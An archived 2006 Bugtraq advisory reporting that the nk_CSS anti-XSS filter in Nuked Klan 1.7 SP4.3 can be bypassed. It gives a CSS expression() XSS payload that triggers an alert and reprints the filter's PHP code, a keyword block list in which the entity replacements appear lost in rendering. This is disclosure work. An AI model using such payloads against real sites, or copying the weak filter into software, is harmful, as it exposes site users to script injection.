[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44F53D6D.7010405@skynet.be>
Date: Wed, 30 Aug 2006 09:25:33 +0200
From: Blwood <blwood@...net.be>
To: Bugtraq@...urityfocus.com
Subject: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
// *- BEGIN -*
// By Blwood
// http://blwood.net <http://blwood.net/>
We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :
<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>
Here is the function :
function nk_CSS($str)
{
if ($str != "")
{
$str = eregi_replace("content-disposition:","content-disposition:",$str);
$str = eregi_replace("content-type:","content-type:",$str);
$str = eregi_replace("content-transfer-encoding:","content-transfer-encoding:",$str);
$str = eregi_replace("include","include",$str);
$str = eregi_replace("\<\?","<?",$str);
$str = eregi_replace("<\?php","<?php",$str);
$str = eregi_replace("\?\>","?>",$str);
$str = eregi_replace("script","script",$str);
$str = eregi_replace("eval","eval",$str);
$str = eregi_replace("javascript","javascript",$str);
$str = eregi_replace("embed","embed",$str);
$str = eregi_replace("iframe","iframe",$str);
$str = eregi_replace("refresh", "refresh", $str);
$str = eregi_replace("onload", "onload", $str);
$str = eregi_replace("onstart", "onstart", $str);
$str = eregi_replace("onerror", "onerror", $str);
$str = eregi_replace("onabort", "onabort", $str);
$str = eregi_replace("onblur", "onblur", $str);
$str = eregi_replace("onchange", "onchange", $str);
$str = eregi_replace("onclick", "onclick", $str);
$str = eregi_replace("ondblclick", "ondblclick", $str);
$str = eregi_replace("onfocus", "onfocus", $str);
$str = eregi_replace("onkeydown", "onkeydown", $str);
$str = eregi_replace("onkeypress", "onkeypress", $str);
$str = eregi_replace("onkeyup", "onkeyup", $str);
$str = eregi_replace("onmousedown", "onmousedown", $str);
$str = eregi_replace("onmousemove", "onmousemove", $str);
$str = eregi_replace("onmouseover", "onmouseover", $str);
$str = eregi_replace("onmouseout", "onmouseout", $str);
$str = eregi_replace("onmouseup", "onmouseup", $str);
$str = eregi_replace("onreset", "onreset", $str);
$str = eregi_replace("onselect", "onselect", $str);
$str = eregi_replace("onsubmit", "onsubmit", $str);
$str = eregi_replace("onunload", "onunload", $str);
$str = eregi_replace("document", "document", $str);
$str = eregi_replace("cookie", "cookie", $str);
$str = eregi_replace("vbscript", "vbscript", $str);
$str = eregi_replace("location", "location", $str);
$str = eregi_replace("object", "object", $str);
$str = eregi_replace("vbs", "vbs", $str);
$str = eregi_replace("href", "href", $str);
$str = eregi_replace("src", "src", $str);
}
return($str);
}
// *- END -*
Powered by blists - more mailing lists